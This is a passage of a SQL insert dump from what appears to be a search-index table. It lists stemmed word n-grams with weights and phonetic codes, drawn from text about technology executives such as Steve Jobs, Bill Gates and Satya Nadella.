his',0,1,1.6333,'I5153652',1,'en'),(42012,'invention','invent',0,0,0.6,'I51535',1,'en'),(42013,'invention that','invent that',0,1,1.4667,'I515353',1,'en'),(42014,'invention that set','invent that set',0,1,1.6,'I51535323',1,'en'),(42015,'invents','invent',0,0,0.4667,'I51532',1,'en'),(42016,'invents an','invent an',0,1,1.3333,'I515325',1,'en'),(42017,'invents an iphone','invent an iphone',0,1,1.5667,'I51532515',1,'en'),(42018,'ipad changing','ipad changing',0,1,1.4333,'I1325252',1,'en'),(42019,'ipad changing the','ipad changing the',0,1,1.5667,'I13252523',1,'en'),(42020,'iphone as','iphon as',0,1,1.3,'I152',1,'en'),(42021,'iphone as well','iphon as well',0,1,1.4667,'I1524',1,'en'),(42022,'iphone there\'s','iphon there',0,1,1.4667,'I15362',1,'en'),(42023,'iphone there\'s a','iphon there a',0,1,1.5333,'I15362',1,'en'),(42024,'iphone were','iphon were',0,1,1.3667,'I156',1,'en'),(42025,'iphone were released','iphon were released',0,1,1.6667,'I156423',1,'en'),(42026,'ipod the','ipod the',0,1,1.2667,'I130',1,'en'),(42027,'ipod the iphone','ipod the iphone',0,1,1.5,'I1315',1,'en'),(42028,'is an illustration','is an illustration',0,1,1.6,'I25423635',1,'en'),(42029,'is hoping','is hoping',0,1,1.3,'I2152',1,'en'),(42030,'is hoping do','is hoping do',0,1,1.4,'I21523',1,'en'),(42031,'is spinning','is spinning',0,1,1.3667,'I2152',1,'en'),(42032,'is spinning his','is spinning his',0,1,1.5,'I2152',1,'en'),(42033,'is that he','is that he',0,1,1.3333,'I230',1,'en'),(42034,'is that the','is that the',0,1,1.3667,'I230',1,'en'),(42035,'is the programmer','is the programmer',0,1,1.5667,'I23162656',1,'en'),(42036,'isn\'t what\'s','isn what',0,1,1.4,'I2532',1,'en'),(42037,'isn\'t what\'s needed','isn what needed',0,1,1.6333,'I253253',1,'en'),(42038,'it became','it became',0,1,1.3,'I3125',1,'en'),(42039,'it became the','it became the',0,1,1.4333,'I31253',1,'en'),(42040,'it grow','it grow',0,1,1.2333,'I326',1,'en'),(42041,'it grow from','it grow from',0,1,1.4,'I326165',1,'en'),(42042,'it on','it on',0,1,1.1667,'I350',1,'en'),(42043,'it on its','it on its',0,1,1.3,'I3532',1,'en'),(42044,'it out in','it out in',0,1,1.3,'I350',1,'en'),(42045,'it recapture','it recapture',0,1,1.4,'I362136',1,'en'),(42046,'it recapture the','it recapture the',0,1,1.5333,'I3621363',1,'en'),(42047,'it struggled','it struggled',0,1,1.4,'I3236243',1,'en'),(42048,'it struggled for','it struggled for',0,1,1.5333,'I323624316',1,'en'),(42049,'it was under','it was under',0,1,1.4,'I32536',1,'en'),(42050,'its business','it business',0,1,1.4,'I321252',1,'en'),(42051,'its business manager','it business manager',0,1,1.6667,'I321252526',1,'en'),(42052,'its lead','it lead',0,1,1.2667,'I3243',1,'en'),(42053,'its lead in','it lead in',0,1,1.3667,'I32435',1,'en'),(42054,'its monopoly','it monopoly',0,1,1.4,'I32514',1,'en'),(42055,'its monopoly with','it monopoly with',0,1,1.5667,'I325143',1,'en'),(42056,'its value','it value',0,1,1.3,'I3214',1,'en'),(42057,'its value and','it value and',0,1,1.4333,'I321453',1,'en'),(42058,'its way','it way',0,1,1.2333,'I320',2,'en'),(42059,'its way in','it way in',0,1,1.3333,'I325',1,'en'),(42060,'itself for','itself for',0,1,1.3333,'I32416',1,'en'),(42061,'itself for the','itself for the',0,1,1.4667,'I324163',1,'en'),(42062,'jerry yang\'s','jerri yang',0,1,1.4,'J652',1,'en'),(42063,'jerry yang\'s training','jerri yang training',0,1,1.7,'J6523652',1,'en'),(42064,'jobs at','job at',0,1,1.2333,'J123',1,'en'),(42065,'jobs at apple','job at apple',0,1,1.4333,'J12314',1,'en'),(42066,'jobs bill','job bill',0,1,1.3,'J1214',1,'en'),(42067,'jobs bill gates','job bill gates',0,1,1.5,'J1214232',1,'en'),(42068,'jobs didn\'t','job didn',0,1,1.3667,'J12353',1,'en'),(42069,'jobs didn\'t devote','job didn devote',0,1,1.6,'J1235313',1,'en'),(42070,'jobs have','job have',0,1,1.3,'J121',1,'en'),(42071,'jobs have been','job have been',0,1,1.4667,'J1215',1,'en'),(42072,'jobs returned','job returned',0,1,1.4333,'J1263653',1,'en'),(42073,'jobs returned to','job returned to',0,1,1.5333,'J1263653',1,'en'),(42074,'jobs was','job was',0,1,1.2667,'J120',1,'en'),(42075,'jobs was more','job was more',0,1,1.4333,'J1256',1,'en'),(42076,'jobs who','job who',0,1,1.2667,'J120',1,'en'),(42077,'jobs who returns','job who returns',0,1,1.5333,'J1263652',1,'en'),(42078,'john thompson','john thompson',0,1,1.4333,'J535125',1,'en'),(42079,'john thompson to','john thompson to',0,1,1.5333,'J5351253',1,'en'),(42080,'joins','join',0,0,0.3333,'J520',1,'en'),(42081,'joins a','join a',0,1,1.2333,'J520',1,'en'),(42082,'joins a long','join a long',0,1,1.4,'J52452',1,'en'),(42083,'just handed','just handed',0,1,1.3667,'J353',1,'en'),(42084,'just handed over','just handed over',0,1,1.5333,'J35316',1,'en'),(42085,'keeping up','keep up',0,1,1.3333,'K1521',1,'en'),(42086,'keeping up smartphone','keep up smartphone',0,1,1.7,'K1521256315',1,'en'),(42087,'ken','ken',0,0,0.2,'K500',1,'en'),(42088,'ken jobs','ken jobs',0,1,1.2667,'K5212',1,'en'),(42089,'ken jobs at','ken jobs at',0,1,1.3667,'K52123',1,'en'),(42090,'kept as','kept as',0,1,1.2333,'K132',1,'en'),(42091,'kept as lululemon','kept as lululemon',0,1,1.5667,'K13245',1,'en'),(42092,'key','kei',0,0,0.2,'K000',2,'en'),(42093,'key role','kei role',0,1,1.2667,'K640',1,'en'),(42094,'key role in','kei role in',0,1,1.3667,'K645',1,'en'),(42095,'landscape','landscap',0,0,0.6,'L5321',1,'en'),(42096,'landscape of','landscap of',0,1,1.4,'L5321',1,'en'),(42097,'landscape of the','landscap of the',0,1,1.5333,'L53213',1,'en'),(42098,'landscape that\'s','landscap that',0,1,1.5333,'L532132',1,'en'),(42099,'landscape that\'s altered','landscap that altered',0,1,1.8,'L5321324363',1,'en'),(42100,'laptops ge','laptop ge',0,1,1.3333,'L1312',1,'en'),(42101,'laptops ge were','laptop ge were',0,1,1.5,'L13126',1,'en'),(42102,'largest coffee','largest coffee',0,1,1.4667,'L62321',1,'en'),(42103,'largest coffee shop','largest coffee shop',0,1,1.6333,'L6232121',1,'en'),(42104,'largest software','largest software',0,1,1.5333,'L6232136',1,'en'),(42105,'largest software maker','largest software maker',0,1,1.7333,'L6232136526',1,'en'),(42106,'last year','last year',0,1,1.3,'L236',1,'en'),(42107,'last year and','last year and',0,1,1.4333,'L23653',1,'en'),(42108,'last year chip','last year chip',0,1,1.4667,'L23621',1,'en'),(42109,'late','late',0,0,0.2667,'L300',2,'en'),(42110,'late 1990s','late 1990s',0,1,1.3333,'L320',1,'en'),(42111,'late 1990s almost','late 1990s almost',0,1,1.5667,'L324523',1,'en'),(42112,'later after','later after',0,1,1.3667,'L36136',1,'en'),(42113,'later after the','later after the',0,1,1.5,'L361363',1,'en'),(42114,'later the stock','later the stock',0,1,1.5,'L363232',1,'en'),(42115,'lauren continues','lauren continues',0,1,1.5333,'L6525352',1,'en'),(42116,'lauren continues to','lauren continues to',0,1,1.6333,'L65253523',1,'en'),(42117,'lazaridis','lazaridi',0,0,0.6,'L2632',1,'en'),(42118,'lazaridis and','lazaridi and',0,1,1.4333,'L263253',1,'en'),(42119,'lazaridis and his','lazaridi and his',0,1,1.5667,'L2632532',1,'en'),(42120,'lead in','lead in',0,1,1.2333,'L350',1,'en'),(42121,'lead in world','lead in world',0,1,1.4333,'L35643',1,'en'),(42122,'leave and write','leav and write',0,1,1.5,'L15363',1,'en'),(42123,'led','led',0,0,0.2,'L300',1,'en'),(42124,'led to','led to',0,1,1.2,'L300',1,'en'),(42125,'led to a','led to a',0,1,1.2667,'L300',1,'en'),(42126,'left his','left his',0,1,1.2667,'L132',1,'en'),(42127,'left his corporate','left his corporate',0,1,1.6,'L1326163',1,'en'),(42128,'left theceojob','left theceojob',0,1,1.4667,'L1321',1,'en'),(42129,'left theceojob in','left theceojob in',0,1,1.5667,'L13215',1,'en'),(42130,'legacy\'','legaci',0,0,0.4667,'L200',1,'en'),(42131,'legacy\' mindset','legaci mindset',0,1,1.5,'L25323',1,'en'),(42132,'legacy\' mindset she','legaci mindset she',0,1,1.6333,'L253232',1,'en'),(42133,'less than','less than',0,1,1.3,'L235',1,'en'),(42134,'less than 20','less than 20',0,1,1.4,'L235',1,'en'),(42135,'life aceoas','life aceoas',0,1,1.3667,'L120',1,'en'),(42136,'life aceoas sales','life aceoas sales',0,1,1.5667,'L1242',1,'en'),(42137,'line of','line of',0,1,1.2333,'L510',1,'en'),(42138,'line of entrepreneurs','line of entrepreneurs',0,1,1.7,'L5153616562',1,'en'),(42139,'locosounds months','locosound months',0,1,1.5667,'L2532532',1,'en'),(42140,'locosounds months before','locosound months before',0,1,1.8,'L253253216',1,'en'),(42141,'long before','long before',0,1,1.3667,'L5216',1,'en'),(42142,'long before apple','long before apple',0,1,1.5667,'L521614',1,'en'),(42143,'long line','long line',0,1,1.3,'L5245',1,'en'),(42144,'long line of','long line of',0,1,1.4,'L52451',1,'en'),(42145,'long period','long period',0,1,1.3667,'L52163',1,'en'),(42146,'long period he\'s','long period he',0,1,1.5333,'L521632',1,'en'),(42147,'long periods','long periods',0,1,1.4,'L521632',1,'en'),(42148,'long periods of','long periods of',0,1,1.5,'L5216321',1,'en'),(42149,'long to non','long to non',0,1,1.3667,'L5235',1,'en'),(42150,'looking and','look and',0,1,1.3667,'L25253',1,'en'),(42151,'looking and easy','look and easy',0,1,1.5333,'L252532',1,'en'),(42152,'loses','lose',0,0,0.3333,'L200',1,'en'),(42153,'loses board','lose board',0,1,1.3667,'L2163',1,'en'),(42154,'loses board chairmicrosoft','lose board chairmicrosoft',0,1,1.8667,'L216326526213',1,'en'),(42155,'lost 60','lost 60',0,1,1.2333,'L230',1,'en'),(42156,'lost 60 percent','lost 60 percent',0,1,1.5,'L2316253',1,'en'),(42157,'lost its','lost its',0,1,1.2667,'L232',1,'en'),(42158,'lost its lead','lost its lead',0,1,1.4333,'L23243',1,'en'),(42159,'ltd','ltd',0,0,0.2,'L300',1,'en'),(42160,'ltd co','ltd co',0,1,1.2,'L320',1,'en'),(42161,'ltd co founder','ltd co founder',0,1,1.4667,'L321536',1,'en'),(42162,'lululemon','lululemon',0,0,0.6,'L500',1,'en'),(42163,'lululemon athletica','lululemon athletica',0,1,1.6333,'L53432',1,'en'),(42164,'lululemon athletica inc','lululemon athletica inc',0,1,1.7667,'L5343252',1,'en'),(42165,'machinery','machineri',0,0,0.6,'M256',1,'en'),(42166,'machinery adviser','machineri adviser',0,1,1.5667,'M2563126',1,'en'),(42167,'machinery adviser the','machineri adviser the',0,1,1.7,'M25631263',1,'en'),(42168,'made such','made such',0,1,1.3,'M320',1,'en'),(42169,'made such a','made such a',0,1,1.3667,'M320',1,'en'),(42170,'major critique','major critique',0,1,1.4667,'M262632',1,'en'),(42171,'major critique of','major critique of',0,1,1.5667,'M2626321',1,'en'),(42172,'major driver','major driver',0,1,1.4,'M263616',1,'en'),(42173,'major driver of','major driver of',0,1,1.5,'M2636161',1,'en'),(42174,'majority of','major of',0,1,1.3667,'M2631',1,'en'),(42175,'majority of his','major of his',0,1,1.5,'M26312',1,'en'),(42176,'make laptops','make laptops',0,1,1.4,'M241312',1,'en'),(42177,'make laptops ge','make laptops ge',0,1,1.5,'M241312',1,'en'),(42178,'make products','make products',0,1,1.4333,'M2163232',1,'en'),(42179,'make products good','make products good',0,1,1.6,'M21632323',1,'en'),(42180,'make that','make that',0,1,1.3,'M230',1,'en'),(42181,'make that change','make that change',0,1,1.5333,'M23252',1,'en'),(42182,'maker after','maker after',0,1,1.3667,'M26136',1,'en'),(42183,'maker after he','maker after he',0,1,1.4667,'M26136',1,'en'),(42184,'maker into','maker into',0,1,1.3333,'M2653',1,'en'),(42185,'maker into a','maker into a',0,1,1.4,'M2653',1,'en'),(42186,'maker will','maker will',0,1,1.3333,'M264',1,'en'),(42187,'maker will help','maker will help',0,1,1.5,'M2641',1,'en'),(42188,'management group','manag group',0,1,1.5333,'M253261',1,'en'),(42189,'management group that','manag group that',0,1,1.7,'M2532613',1,'en'),(42190,'manager he','manag he',0,1,1.3333,'M260',1,'en'),(42191,'manager he becameceoin','manag he becameceoin',0,1,1.7333,'M2612525',1,'en'),(42192,'market swelled','market swelled',0,1,1.4667,'M623243',1,'en'),(42193,'market swelled to','market swelled to',0,1,1.5667,'M623243',1,'en'),(42194,'marketing deal','market deal',0,1,1.4667,'M6235234',1,'en'),(42195,'marketing deal with','market deal with',0,1,1.6333,'M62352343',1,'en'),(42196,'member of','member of',0,1,1.3,'M161',1,'en'),(42197,'member of family','member of family',0,1,1.5333,'M16154',1,'en'),(42198,'microsoft','microsoft',0,0,0.6,'M26213',1,'en'),(42199,'microsoft and','microsoft and',0,1,1.4333,'M2621353',1,'en'),(42200,'microsoft and failing','microsoft and failing',0,1,1.7,'M26213531452',1,'en'),(42201,'microsoft continues','microsoft continues',0,1,1.6333,'M2621325352',1,'en'),(42202,'microsoft continues money','microsoft continues money',0,1,1.8333,'M26213253525',1,'en'),(42203,'microsoft corp','microsoft corp',0,1,1.4667,'M26213261',1,'en'),(42204,'microsoft corp ceo','microsoft corp ceo',0,1,1.6,'M262132612',1,'en'),(42205,'microsoft even','microsoft even',0,1,1.4667,'M2621315',1,'en'),(42206,'microsoft even if','microsoft even if',0,1,1.5667,'M26213151',1,'en'),(42207,'microsoft safe','microsoft safe',0,1,1.4667,'M2621321',1,'en'),(42208,'microsoft safe 93','microsoft safe 93',0,1,1.5667,'M2621321',1,'en'),(42209,'microsoft software','microsoft software',0,1,1.6,'M262132136',1,'en'),(42210,'microsoft software a','microsoft software a',0,1,1.6667,'M262132136',1,'en'),(42211,'microsoft\'s','microsoft',0,0,0.7333,'M262132',1,'en'),(42212,'microsoft\'s successful','microsoft successful',0,1,1.7333,'M26213214',1,'en'),(42213,'microsoft\'s successful efforts','microsoft successful efforts',0,1,2,'M262132141632',1,'en'),(42214,'mike','mike',0,0,0.2667,'M200',1,'en'),(42215,'mike lazaridis','mike lazaridis',0,1,1.4667,'M242632',1,'en'),(42216,'mike lazaridis and','mike lazaridis and',0,1,1.6,'M24263253',1,'en'),(42217,'mindset','mindset',0,0,0.4667,'M323',1,'en'),(42218,'mindset rather','mindset rather',0,1,1.4667,'M323636',1,'en'),(42219,'mindset rather than','mindset rather than',0,1,1.6333,'M32363635',1,'en'),(42220,'mindset she','mindset she',0,1,1.3667,'M3232',1,'en'),(42221,'mindset she these','mindset she these',0,1,1.5667,'M323232',1,'en'),(42222,'missed the mobile','miss the mobile',0,1,1.5667,'M23514',1,'en'),(42223,'mobile trend','mobil trend',0,1,1.4,'M143653',1,'en'),(42224,'mobile trend he','mobil trend he',0,1,1.5,'M143653',1,'en'),(42225,'money software','monei software',0,1,1.4667,'M2136',1,'en'),(42226,'money software than','monei software than',0,1,1.6333,'M213635',1,'en'),(42227,'monopoly','monopoli',0,0,0.5333,'M140',1,'en'),(42228,'monopoly with','monopoli with',0,1,1.4333,'M143',1,'en'),(42229,'monopoly with windows','monopoli with windows',0,1,1.7,'M143532',1,'en'),(42230,'months before','month before',0,1,1.4333,'M3216',1,'en'),(42231,'months before he','month before he',0,1,1.5333,'M3216',1,'en'),(42232,'more of a','more of a',0,1,1.3,'M610',1,'en'),(42233,'more than he','more than he',0,1,1.4,'M635',1,'en'),(42234,'most effective','most effective',0,1,1.4667,'M231231',1,'en'),(42235,'most effective technology','most effective technology',0,1,1.8333,'M23123132542',1,'en'),(42236,'most individuals','most individuals',0,1,1.5333,'M23531342',1,'en'),(42237,'most individuals jobs','most individuals jobs',0,1,1.7,'M2353134212',1,'en'),(42238,'most not','most not',0,1,1.2667,'M2353',1,'en'),(42239,'most not running','most not running',0,1,1.5333,'M2353652',1,'en'),(42240,'mostly pcs','mostli pcs',0,1,1.3333,'M23412',1,'en'),(42241,'mostly pcs the','mostli pcs the',0,1,1.4667,'M234123',1,'en'),(42242,'motors','motor',0,0,0.4,'M362',1,'en'),(42243,'motors co','motor co',0,1,1.3,'M362',1,'en'),(42244,'motors co that','motor co that',0,1,1.4667,'M3623',1,'en'),(42245,'moved','move',0,0,0.3333,'M130',1,'en'),(42246,'moved aside','move aside',0,1,1.3667,'M1323',1,'en'),(42247,'moved aside as','move aside as',0,1,1.4667,'M13232',1,'en'),(42248,'movies','movi',0,0,0.4,'M120',1,'en'),(42249,'movies and','movi and',0,1,1.3333,'M1253',1,'en'),(42250,'movies and conduct','movi and conduct',0,1,1.6,'M125325323',1,'en'),(42251,'ms','ms',0,0,0.1333,'M200',1,'en'),(42252,'ms nobody','ms nobody',0,1,1.3,'M2513',1,'en'),(42253,'ms nobody will','ms nobody will',0,1,1.4667,'M25134',1,'en'),(42254,'music watch','music watch',0,1,1.3667,'M232',1,'en'),(42255,'music watch free','music watch free',0,1,1.5333,'M23216',1,'en'),(42256,'nadella','nadella',0,0,0.4667,'N340',1,'en'),(42257,'nadella as','nadella as',0,1,1.3333,'N342',1,'en'),(42258,'nadella as next','nadella as next',0,1,1.5,'N342523',1,'en'),(42259,'nadella restructures','nadella restructures',0,1,1.6667,'N3462362362',1,'en'),(42260,'nadella restructures the','nadella restructures the',0,1,1.8,'N34623623623',1,'en'),(42261,'nadella\'s','nadella',0,0,0.6,'N342',1,'en'),(42262,'nadella\'s machinery','nadella machinery',0,1,1.6333,'N3425256',1,'en'),(42263,'nadella\'s machinery adviser','nadella machinery adviser',0,1,1.9,'N34252563126',1,'en'),(42264,'names insider','name insider',0,1,1.4333,'N25236',1,'en'),(42265,'names insider satya','name insider satya',0,1,1.6333,'N2523623',1,'en'),(42266,'namesake','namesak',0,0,0.5333,'N200',1,'en'),(42267,'namesake company','namesak company',0,1,1.5333,'N2515',1,'en'),(42268,'namesake company after','namesak company after',0,1,1.7333,'N2515136',1,'en'),(42269,'near','near',0,0,0.2667,'N600',1,'en'),(42270,'near gates','near gates',0,1,1.3333,'N6232',1,'en'),(42271,'near gates achieved','near gates achieved',0,1,1.6333,'N623213',1,'en'),(42272,'need for','need for',0,1,1.2667,'N316',1,'en'),(42273,'need for a','need for a',0,1,1.3333,'N316',1,'en'),(42274,'needed to','need to',0,1,1.3,'N300',1,'en'),(42275,'needed to be','need to be',0,1,1.4,'N310',1,'en'),(42276,'never leave','never leave',0,1,1.3667,'N1641',1,'en'),(42277,'never leave and','never leave and',0,1,1.5,'N164153',1,'en'),(42278,'new microsoft','new microsoft',0,1,1.4333,'N26213',1,'en'),(42279,'new microsoft corp','new microsoft corp',0,1,1.6,'N26213261',1,'en'),(42280,'next','next',0,0,0.2667,'N230',1,'en'),(42281,'next ceo','next ceo',0,1,1.2667,'N232',1,'en'),(42282,'next ceo john','next ceo john',0,1,1.4333,'N2325',1,'en'),(42283,'next epoch','next epoch',0,1,1.3333,'N2312',1,'en'),(42284,'next epoch retailing','next epoch retailing',0,1,1.6667,'N231263452',1,'en'),(42285,'next facts','next facts',0,1,1.3333,'N231232',1,'en'),(42286,'next facts change','next facts change',0,1,1.5667,'N23123252',1,'en'),(42287,'nobody will','nobodi will',0,1,1.3667,'N134',1,'en'),(42288,'nobody will be','nobodi will be',0,1,1.4667,'N1341',1,'en'),(42289,'non business','non business',0,1,1.4,'N1252',1,'en'),(42290,'non business pursuits','non business pursuits',0,1,1.7,'N125216232',1,'en'),(42291,'not able','not able',0,1,1.2667,'N314',1,'en'),(42292,'not able to','not able to',0,1,1.3667,'N3143',1,'en'),(42293,'not running','not running',0,1,1.3667,'N3652',1,'en'),(42294,'not running on','not running on',0,1,1.4667,'N36525',1,'en'),(42295,'notice of','notic of',0,1,1.3,'N321',1,'en'),(42296,'notice of music','notic of music',0,1,1.5,'N32152',1,'en'),(42297,'now a','now a',0,1,1.1667,'N000',1,'en'),(42298,'now a major','now a major',0,1,1.3667,'N260',1,'en'),(42299,'occupy','occupi',0,0,0.4,'O210',1,'en'),(42300,'occupy the','occupi the',0,1,1.3333,'O213',1,'en'),(42301,'occupy the majority','occupi the majority',0,1,1.6333,'O2135263',1,'en'),(42302,'of a builder','of a builder',0,1,1.4,'O1436',1,'en'),(42303,'of a serial','of a serial',0,1,1.3667,'O1264',1,'en'),(42304,'of abroad','of abroad',0,1,1.3,'O163',1,'en'),(42305,'of abroad growth','of abroad growth',0,1,1.5333,'O163263',1,'en'),(42306,'of consumer','of consumer',0,1,1.3667,'O125256',1,'en'),(42307,'of consumer computing','of consumer computing',0,1,1.7,'O125256251352',1,'en'),(42308,'of earth\'s','of earth',0,1,1.3333,'O1632',1,'en'),(42309,'of earth\'s largest','of earth largest',0,1,1.6,'O16324623',1,'en'),(42310,'of entrepreneurs','of entrepreneurs',0,1,1.5333,'O153616562',1,'en'),(42311,'of entrepreneurs from','of entrepreneurs from',0,1,1.7,'O153616562165',1,'en'),(42312,'of executive','of executive',0,1,1.4,'O1231',1,'en'),(42313,'of executive and','of executive and',0,1,1.5333,'O123153',1,'en'),(42314,'of family','of family',0,1,1.3,'O154',1,'en'),(42315,'of family distance','of family distance',0,1,1.6,'O15432352',1,'en'),(42316,'of gates','of gates',0,1,1.2667,'O1232',1,'en'),(42317,'of gates is','of gates is',0,1,1.3667,'O1232',1,'en'),(42318,'of his time','of his time',0,1,1.3667,'O1235',1,'en'),(42319,'of instant','of instant',0,1,1.3333,'O152353',1,'en'),(42320,'of instant coffee','of instant coffee',0,1,1.5667,'O15235321',1,'en'),(42321,'of its value','of its value',0,1,1.4,'O13214',1,'en'),(42322,'of locosounds','of locosounds',0,1,1.4333,'O142532',1,'en'),(42323,'of locosounds months','of locosounds months',0,1,1.6667,'O142532532',1,'en'),(42324,'of music','of music',0,1,1.2667,'O152',1,'en'),(42325,'of music watch','of music watch',0,1,1.4667,'O15232',1,'en'),(42326,'of somebody','of somebody',0,1,1.3667,'O12513',1,'en'),(42327,'of somebody who','of somebody who',0,1,1.5,'O12513',1,'en'),(42328,'of the day','of the day',0,1,1.3333,'O130',1,'en'),(42329,'of the hardware','of the hardware',0,1,1.5,'O13636',1,'en'),(42330,'of the ipod','of the ipod',0,1,1.3667,'O1313',1,'en'),(42331,'of the late','of the late',0,1,1.3667,'O1343',1,'en'),(42332,'of the management','of the management',0,1,1.5667,'O135253',1,'en'),(42333,'of the original','of the original',0,1,1.5,'O136254',1,'en'),(42334,'of the way','of the way',0,1,1.3333,'O130',1,'en'),(42335,'of things after','of things after',0,1,1.5,'O1352136',1,'en'),(42336,'of this what','of this what',0,1,1.4,'O1323',1,'en'),(42337,'of time later','of time later',0,1,1.4333,'O135436',1,'en'),(42338,'office as','offic as',0,1,1.3,'O120',1,'en'),(42339,'office as indispensable','offic as indispensable',0,1,1.7667,'O1253215214',1,'en'),(42340,'officer to','offic to',0,1,1.3333,'O1263',1,'en'),(42341,'officer to focus','offic to focus',0,1,1.5333,'O126312',1,'en'),(42342,'old co','old co',0,1,1.2,'O432',1,'en'),(42343,'old co founder','old co founder',0,1,1.4667,'O4321536',1,'en'),(42344,'on apple','on apple',0,1,1.2667,'O514',1,'en'),(42345,'on apple until','on apple until',0,1,1.4667,'O514534',1,'en'),(42346,'on every','on every',0,1,1.2667,'O516',1,'en'),(42347,'on every desk','on every desk',0,1,1.4333,'O51632',1,'en'),(42348,'on its','on its',0,1,1.2,'O532',1,'en'),(42349,'on its way','on its way',0,1,1.3333,'O532',1,'en'),(42350,'on microsoft','on microsoft',0,1,1.4,'O526213',1,'en'),(42351,'on microsoft software','on microsoft software',0,1,1.7,'O5262132136',1,'en'),(42352,'on what','on what',0,1,1.2333,'O530',1,'en'),(42353,'on what he','on what he',0,1,1.3333,'O530',1,'en'),(42354,'only choice','onli choice',0,1,1.3667,'O542',1,'en'),(42355,'only choice for','onli choice for',0,1,1.5,'O54216',1,'en'),(42356,'operations to','oper to',0,1,1.4333,'O163523',1,'en'),(42357,'operations to his','oper to his',0,1,1.5667,'O1635232',1,'en'),(42358,'ordered breakup','order breakup',0,1,1.5,'O63631621',1,'en'),(42359,'ordered breakup microsoft','order breakup microsoft',0,1,1.8333,'O63631621526213',1,'en'),(42360,'original','origin',0,0,0.5333,'O6254',1,'en'),(42361,'original success','origin success',0,1,1.5333,'O62542',1,'en'),(42362,'original success isn\'t','origin success isn',0,1,1.7333,'O6254253',1,'en'),(42363,'other company','other company',0,1,1.4333,'O362515',2,'en'),(42364,'other company gateways','other company gateways',0,1,1.7333,'O362515232',1,'en'),(42365,'ousted','oust',0,0,0.4,'O230',1,'en'),(42366,'ousted asceo','oust asceo',0,1,1.4,'O232',1,'en'),(42367,'ousted asceo even','oust asceo even',0,1,1.5667,'O23215',1,'en'),(42368,'out in','out in',0,1,1.2,'O350',1,'en'),(42369,'out in the','out in the',0,1,1.3333,'O353',1,'en'),(42370,'out ralph','out ralph',0,1,1.3,'O3641',1,'en'),(42371,'out ralph lauren','out ralph lauren',0,1,1.5333,'O3641465',1,'en'),(42372,'out twice','out twice',0,1,1.3,'O320',1,'en'),(42373,'out twice the','out twice the',0,1,1.4333,'O323',1,'en'),(42374,'out what','out what',0,1,1.2667,'O300',1,'en'),(42375,'out what to','out what to',0,1,1.3667,'O300',1,'en'),(42376,'outfits','outfit',0,0,0.4667,'O3132',1,'en'),(42377,'outfits at','outfit at',0,1,1.3333,'O31323',1,'en'),(42378,'outfits at his','outfit at his',0,1,1.4667,'O313232',1,'en'),(42379,'outlet uk of','outlet uk of',0,1,1.4,'O34321',1,'en'),(42380,'over day','over day',0,1,1.2667,'O163',1,'en'),(42381,'over day to','over day to',0,1,1.3667,'O163',1,'en'),(42382,'oversaw','oversaw',0,0,0.4667,'O162',1,'en'),(42383,'oversaw the','oversaw the',0,1,1.3667,'O1623',1,'en'),(42384,'oversaw the creation','oversaw the creation',0,1,1.6667,'O16232635',1,'en'),(42385,'overstaying','overstai',0,0,0.7333,'O162352',1,'en'),(42386,'overstaying his','overstai his',0,1,1.5,'O162352',1,'en'),(42387,'overstaying his welcome','overstai his welcome',0,1,1.7667,'O162352425',1,'en'),(42388,'owner mindset','owner mindset',0,1,1.4333,'O565323',1,'en'),(42389,'owner mindset rather','owner mindset rather',0,1,1.6667,'O565323636',1,'en'),(42390,'packets','packet',0,0,0.4667,'P232',1,'en'),(42391,'packets of','packet of',0,1,1.3333,'P2321',1,'en'),(42392,'packets of instant','packet of instant',0,1,1.6,'P232152353',1,'en'),(42393,'part time','part time',0,1,1.3,'P635',1,'en'),(42394,'part time as','part time as',0,1,1.4,'P6352',1,'en'),(42395,'particular business','particular business',0,1,1.6333,'P632461252',1,'en'),(42396,'particular business had','particular business had',0,1,1.7667,'P6324612523',1,'en'),(42397,'particular design','particular design',0,1,1.5667,'P63246325',1,'en'),(42398,'particular design details','particular design details',0,1,1.8333,'P63246325342',1,'en'),(42399,'partner took','partner took',0,1,1.4,'P635632',1,'en'),(42400,'partner took an','partner took an',0,1,1.5,'P6356325',1,'en'),(42401,'pc in','pc in',0,1,1.1667,'P250',1,'en'),(42402,'pc in 1981','pc in 1981',0,1,1.3333,'P250',1,'en'),(42403,'pc maker','pc maker',0,1,1.2667,'P2526',1,'en'),(42404,'pc maker into','pc maker into',0,1,1.4333,'P252653',1,'en'),(42405,'pc on','pc on',0,1,1.1667,'P250',1,'en'),(42406,'pc on every','pc on every',0,1,1.3667,'P2516',1,'en'),(42407,'pcs','pc',0,0,0.2,'P200',1,'en'),(42408,'pcs the','pc the',0,1,1.2333,'P230',1,'en'),(42409,'pcs the particular','pc the particular',0,1,1.6,'P23163246',1,'en'),(42410,'people communicate','peopl communicate',0,1,1.6,'P42523',1,'en'),(42411,'people communicate take','peopl communicate take',0,1,1.7667,'P425232',1,'en'),(42412,'percent','percent',0,0,0.4667,'P6253',1,'en'),(42413,'percent 12','percent 12',0,1,1.3333,'P6253',1,'en'),(42414,'percent 12 years','percent 12 years',0,1,1.5333,'P625362',1,'en'),(42415,'percent of','percent of',0,1,1.3333,'P62531',1,'en'),(42416,'percent of consumer','percent of consumer',0,1,1.6333,'P6253125256',1,'en'),(42417,'percent of its','percent of its',0,1,1.4667,'P6253132',1,'en'),(42418,'period he\'s','period he',0,1,1.3667,'P632',1,'en'),(42419,'period he\'s said','period he said',0,1,1.5333,'P6323',1,'en'),(42420,'periods','period',0,0,0.4667,'P632',1,'en'),(42421,'periods of','period of',0,1,1.3333,'P6321',1,'en'),(42422,'periods of time','period of time',0,1,1.5,'P632135',1,'en'),(42423,'philanthropic','philanthrop',0,0,0.8667,'P453612',1,'en'),(42424,'philanthropic work','philanthrop work',0,1,1.6,'P45361262',1,'en'),(42425,'philanthropic work will','philanthrop work will',0,1,1.7667,'P453612624',1,'en'),(42426,'phone ltd','phone ltd',0,1,1.3,'P543',1,'en'),(42427,'phone ltd co','phone ltd co',0,1,1.4,'P5432',1,'en'),(42428,'plan','plan',0,0,0.2667,'P450',1,'en'),(42429,'plan to','plan to',0,1,1.2333,'P453',1,'en'),(42430,'plan to retool','plan to retool',0,1,1.4667,'P453634',1,'en'),(42431,'play key','plai key',0,1,1.2667,'P420',1,'en'),(42432,'play key role','plai key role',0,1,1.4333,'P4264',1,'en'),(42433,'predicted','predict',0,0,0.6,'P6323',1,'en'),(42434,'predicted via','predict via',0,1,1.4333,'P63231',1,'en'),(42435,'predicted via has','predict via has',0,1,1.5667,'P632312',1,'en'),(42436,'prepared','prepar',0,0,0.5333,'P6163',1,'en'),(42437,'prepared to','prepar to',0,1,1.3667,'P6163',1,'en'),(42438,'prepared to 